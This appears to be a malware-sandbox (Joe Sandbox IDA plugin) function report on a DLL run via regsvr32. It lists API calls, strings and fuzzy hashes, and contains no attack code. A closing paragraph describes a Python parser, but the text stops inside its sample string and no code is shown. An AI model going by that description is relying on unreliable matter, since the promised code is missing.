• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: File$HandleModuleNameWrite
• String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
• String ID:
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: _errno$DecodePointer_getptd
• String ID: -$e+000$gfff
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _errno$ByteCharErrorLastMultiWide
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3895584640-0
                                                                                                                                                                                    • Opcode ID: 8c05147ebc9be867ce35319bbce1104c6b25b1477bc4ad30c9b94d65abf1cd43
                                                                                                                                                                                    • Instruction ID: 2e07fc1dcd4186e5053969f21a42df234c676ec04967014daaced9b4438d3042
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c05147ebc9be867ce35319bbce1104c6b25b1477bc4ad30c9b94d65abf1cd43
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0351A4326066888AF7F39FA5E0407EEB790B38D7D0F68C115F69947AC5CE78CA498701
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
Similarity
• API ID: Message$Window$PeekSendUpdate$LongParent
• String ID:
• API String ID: 2853195852-0
• Opcode ID: 521fb216197092060e1255597202c9f501887027c04918bf3cf28e2e6dae3f12
• Instruction ID: d5919084e813515b551a04d63d74427c2aa65c25303876256ebad84584e92488
• Opcode Fuzzy Hash: 521fb216197092060e1255597202c9f501887027c04918bf3cf28e2e6dae3f12
• Instruction Fuzzy Hash: 1541C432604ACC82FBE6DB26D8497EA73A1BB8DBC4F15D424FE0553695DF38CA498700
Uniqueness
• Uniqueness Score: -1.00%

APIs
Similarity
• API ID: MetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
• String ID:
• API String ID: 1182735605-0
• Opcode ID: 81ef6b8dc79c311c082dd4e339fa402c74f1a77fd9d6046b71fbb5e8db54486b
• Instruction ID: 6396cba0f8348ba34940b31b6af6ad7d381c212d192f7aa7d10b446046caa961
• Opcode Fuzzy Hash: 81ef6b8dc79c311c082dd4e339fa402c74f1a77fd9d6046b71fbb5e8db54486b
• Instruction Fuzzy Hash: A0218C32218A4986E7A1DB35E45879F73A0F78DBC5F458121FE8E83758CF38D60A8B40
Uniqueness
• Uniqueness Score: -1.00%

APIs
Similarity
• API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
• String ID:
• API String ID: 1269745586-0
• Opcode ID: 70a2fb072c00225d7c7db3b490eb8d81a4e437aaaaaac7ab38b40a578da3d227
• Instruction ID: 1f55c2fed6c493ffe08d6dcfede292f75507489463a8ed8e9b7efe49f0a70e35
• Opcode Fuzzy Hash: 70a2fb072c00225d7c7db3b490eb8d81a4e437aaaaaac7ab38b40a578da3d227
• Instruction Fuzzy Hash: 13314B32608B8986EBA69B50F4403DBB3A4F79C785F508115EB8D43A59EF78C249CB00
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: _errno$DecodePointer_getptd
• String ID: 0$gfffffff
• API String ID: 2834218312-1804767287
• Opcode ID: 2c843449f7fe5b2b76c0d1ed4805592bd3691fbc217902258971889c748f19a7
• Instruction ID: af199aae6fed13a2dfd45317e9722b6eead39349b74fb061a12141e4f58284e9
• Opcode Fuzzy Hash: 2c843449f7fe5b2b76c0d1ed4805592bd3691fbc217902258971889c748f19a7
• Instruction Fuzzy Hash: 66B112727053CC86EBA38B2991453AE7BA6E7597D0F14C222EB5D077D6DA39CA58C300
Uniqueness
• Uniqueness Score: -1.00%

APIs
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• API String ID: 1445889803-0
• Opcode ID: 385050f3830c1cb97e8d02a5e3b130e169b692a8a37a80970b22e0d2a3b16dab
• Instruction ID: 6386498a51f40f0853ba66a5cc7a15e2bf05392e2eb4221cc56a784e8394d85a
• Opcode Fuzzy Hash: 385050f3830c1cb97e8d02a5e3b130e169b692a8a37a80970b22e0d2a3b16dab
• Instruction Fuzzy Hash: 88015B35225A0886E7828F21E8903D66360F74DBD1F46A620FE9E477A4CF3CCA988704
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(?,?,?,?,?,?,00080000,000000018000FC14), ref: 000000018000F02E
• LoadLibraryA.KERNEL32(?,?,?,?,?,?,00080000,000000018000FC14), ref: 000000018000F041
• GetProcAddress.KERNEL32(?,?,?,?,?,?,00080000,000000018000FC14), ref: 000000018000F05F
Strings
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                    • String ID: InitCommonControls
                                                                                                                                                                                    • API String ID: 310444273-2489084829
                                                                                                                                                                                    • Opcode ID: 96f75e27b71ea35d2758aa8c486ac1b3d36d4cb0ab958ba436b58c8f76f8dbf1
                                                                                                                                                                                    • Instruction ID: f5d447bc5e0debc5eba7e3968f8a3cf0b775a4baacca98cb39112e7da828dd06
                                                                                                                                                                                    • Opcode Fuzzy Hash: 96f75e27b71ea35d2758aa8c486ac1b3d36d4cb0ab958ba436b58c8f76f8dbf1
                                                                                                                                                                                    • Instruction Fuzzy Hash: D701E832201F8985DF96CF25E49039973A1E75CF88F198125DA4C47764DF74C9A9C340
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: State$LongMessageSendWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1063413437-0
                                                                                                                                                                                    • Opcode ID: 3378326a2bd31b4697c2027b64095a4f4620bfc6a4c5c14b04252cc7c112c546
                                                                                                                                                                                    • Instruction ID: 9c3a15c8796f1cd257bf9a6991dfaf30841fb567fe232aecd4f01f7e86110207
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3378326a2bd31b4697c2027b64095a4f4620bfc6a4c5c14b04252cc7c112c546
                                                                                                                                                                                    • Instruction Fuzzy Hash: D811CC3430054C82FBF697D6F4153EA2391A74DBC0F49D431FA8A03F85CD24C699A311
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$LoadLockSizeof
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2853612939-0
                                                                                                                                                                                    • Opcode ID: 0643980941f78038ba91f0768f0f340d23a4776233c180e94be5b7ff5dcac873
                                                                                                                                                                                    • Instruction ID: 2f9347a30e5f3aff6e4aec704e026809220156a99409e98979fea9db47e80d42
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0643980941f78038ba91f0768f0f340d23a4776233c180e94be5b7ff5dcac873
                                                                                                                                                                                    • Instruction Fuzzy Hash: 65019E32711B95C9EF928B21A4013EA72A0AB5CFD6F08C121FA9A07784DE7CC9898700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c999c8c1b9d59f4276a9e938d18ca5b7a82132423f0c6caada9f7e5b982e25e4
                                                                                                                                                                                    • Instruction ID: 0103cda5c49e3e6c242f9b0397a4010d769cf60c525843e814d7ec2032ac56e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: c999c8c1b9d59f4276a9e938d18ca5b7a82132423f0c6caada9f7e5b982e25e4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7401123171464CC5F7D6DB26EA407FA73A1AB8CBC1F54C020B95A866A5DE68C74DC702
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlCaptureContext.KERNEL32 ref: 00000001800260FB
                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 0000000180026141
                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32 ref: 000000018002614C
                                                                                                                                                                                      • Part of subcall function 0000000180025A20: GetModuleFileNameA.KERNEL32(?,?,?,?,?,0000000180025C7C,?,?,?,?,0000000180026EC0,?,?,00000000,0000000180026F9F), ref: 0000000180025AE3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextFileModuleName
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2731829486-0
                                                                                                                                                                                    • Opcode ID: 72d68397ff5999bac4f05581ecf67c2f6a0cb7cb6ed2633dd248dd0b9a721e91
                                                                                                                                                                                    • Instruction ID: 1e6b99b5e57517ac92b29ef44594e441f7b6e1da9e928c969eb0052175030eb7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 72d68397ff5999bac4f05581ecf67c2f6a0cb7cb6ed2633dd248dd0b9a721e91
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A014031214A8885F7A7A750E4953EA6391FB8C386F408129FA8E467E6DF3CC60C8711
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                    • Opcode ID: 8d8fd3ade6f0f9f3fd9080fbf3f335f760f3d0c649edeb92a1d081681401aa28
                                                                                                                                                                                    • Instruction ID: 0eeeee1544d46cd204e45caac0c79f22035cc7120e07997e90bc5fab6c158f3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d8fd3ade6f0f9f3fd9080fbf3f335f760f3d0c649edeb92a1d081681401aa28
                                                                                                                                                                                    • Instruction Fuzzy Hash: E3E06D71208E8881F7B3D720E4623DA2790A79C7D9F804212FA8D476E5DE6CC349CB00
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: 2c04419eb05166b5f4f85679e30e22623789b06cff4f49493151306d1dc82ed2
• Instruction ID: 5175f68cf667f3bbd6f17a41ff7102f36e9c0a623622d14ca79f504bbdcd64e9
• Opcode Fuzzy Hash: 2c04419eb05166b5f4f85679e30e22623789b06cff4f49493151306d1dc82ed2
• Instruction Fuzzy Hash: F1E0C03661494485F7B19B21E4657EAB2A0FB9C784F814115A64D46655DF3CC209CB10
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: MessageSend
• String ID: Aramia 0.5$Asia$Atlanta$Beer$Boston$Brand $Bratislava$Brussels$Canada$Chicago$Edinburgh$Europe$Germany$Interbrew$Israel$Karlovacko 0.5$Lisbon$London$Lowenbrau 0.5$Madrid$Milk$New York$North America$Oil$Prague$Russia$San Francisco$Spoon$Stella 0.5$Tnuva 1L$USA$Zagreb
• API String ID: 3850602802-2008252019
• Opcode ID: 208844bb4d3a3c1be25018fb496238dbee32402cb8d9da2cfe9f45a8251ae537
• Instruction ID: aa18ba9f9e216b8bde50958da2e58d8e3178a70db7ec4675ea3b12c79f47abf0
• Opcode Fuzzy Hash: 208844bb4d3a3c1be25018fb496238dbee32402cb8d9da2cfe9f45a8251ae537
• Instruction Fuzzy Hash: F0E10176310A4C95EAA2EB1AE441BDA3750F78DBD8F81E605BD16A7796CE38C30DC700
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: free$ErrorFreeHeapLast_errno
• String ID:
• API String ID: 1012874770-0
• Opcode ID: bb577b9a85017cb3719ed48e79c78b994302a88abbd5bafe51c7ea618849b3c6
• Instruction ID: 4996f8a5240b550789660274a8bd48bfb1e45240b7beb4869c177c223dfdbaa6
• Opcode Fuzzy Hash: bb577b9a85017cb3719ed48e79c78b994302a88abbd5bafe51c7ea618849b3c6
• Instruction Fuzzy Hash: 2441653221264882EA97FB75C4513ED1326ABC8B84F149131F94F5B5A7CF20CB598390
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: Rect$Color$DrawInflate$FillFrameText$ObjectSelect$BrushControlCopyCreateEdgeFocusPixelSolid
• String ID: $
• API String ID: 2391710194-3993045852
• Opcode ID: ac93f53a741285ee5d4aeb4793193632024ac27a05f151434f4d9c5ab7201152
• Instruction ID: 01e0fdf4ac9835bfedb3c7f8d1b51dfbf26cc145f0b8c1af512df1e92cb0b956
• Opcode Fuzzy Hash: ac93f53a741285ee5d4aeb4793193632024ac27a05f151434f4d9c5ab7201152
• Instruction Fuzzy Hash: 77D18E32204A4997EB92DF25E8813DA7371F78DBC5F459121FA5A43AA5DF38DA0DCB00
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 0000000180029641
• GetProcAddress.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 000000018002965D
• GetProcAddress.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 0000000180029685
• EncodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 000000018002968E
• GetProcAddress.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 00000001800296A4
• EncodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 00000001800296AD
• GetProcAddress.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 00000001800296C3
• EncodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 00000001800296CC
• GetProcAddress.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 00000001800296EA
• EncodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 00000001800296F3
• DecodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 0000000180029725
• DecodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 0000000180029734
• DecodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 000000018002978C
• DecodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 00000001800297AC
• DecodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 00000001800297C5
Strings
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
• String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
• API String ID: 3085332118-232180764
• Opcode ID: c7431dbc0c1d9ecc42898ac9b1de424e3355dc3a19de42d0dfe615159c8f1bca
• Instruction ID: 34437edd36ee9e0989787195d817373b6374099aa32c90939d12c7001ff68dab
• Opcode Fuzzy Hash: c7431dbc0c1d9ecc42898ac9b1de424e3355dc3a19de42d0dfe615159c8f1bca
• Instruction Fuzzy Hash: 3651033021AB0990FED7EFA2A8553E963906F8DBC5F49C525BC0A03791EE38C74DA350
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: Long$Class$HookPropWindow$AtomCallErrorGlobalLastNameNext$CompareInfoStringUnhookWindows
• String ID: #32768$AfxOldWndProc423$ime
• API String ID: 2638390148-4034971020
• Opcode ID: 12fb68ecc60adf1877923a5c0fe178f2f5aedfc8ddaf6fc6b32af8699cbb9fa1
• Instruction ID: 02208ee694169da27692b317166679a7945b06398869ecaf0239ef4c20c25a76
• Opcode Fuzzy Hash: 12fb68ecc60adf1877923a5c0fe178f2f5aedfc8ddaf6fc6b32af8699cbb9fa1
• Instruction Fuzzy Hash: 1C717532604E888AEBA79F15E8417EA3361BB8DBD5F498121FD5A177E5CF38C649C300
Uniqueness
Uniqueness Score: -1.00%

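The function blocks above are the Joe Sandbox IDA plugin's per-function records: the API calls seen in the function with their call-site addresses, the memory dump the code was taken from, the API ID and String ID that summarise what the function touches, the opcode and instruction fuzzy hashes, and the Uniqueness Score. A report of this size carries hundreds of them, so triage is easier with the records in structured form. The following Python is an added example and is not part of this report or of Joe Sandbox's own tooling. It parses the blocks out of the report text, stripping the indentation and the "Download File" link labels the HTML rendering leaves on each Associated dump name, then flags functions that load a library and resolve names at run time and indexes the records by Instruction Fuzzy Hash for matching across dumps or reports. The sample text is copied from two of the blocks on this page; the LoadLibrary/GetProcAddress heuristic and the rule that a String ID entry ending in ".DLL" is a library name are assumptions made here, not Joe Sandbox semantics.

```python
import re
from dataclasses import dataclass, field

# Two function blocks copied from this report (indentation removed): the function whose
# API list starts with LoadLibraryA (three of its API lines kept) and the "MessageSend"
# function.  One "Download File" link label is left in to exercise its removal.
SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 0000000180029641
• GetProcAddress.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 000000018002965D
• DecodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 0000000180029725
Strings
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
• String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
• Instruction Fuzzy Hash: 3651033021AB0990FED7EFA2A8553E963906F8DBC5F49C525BC0A03791EE38C74DA350
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
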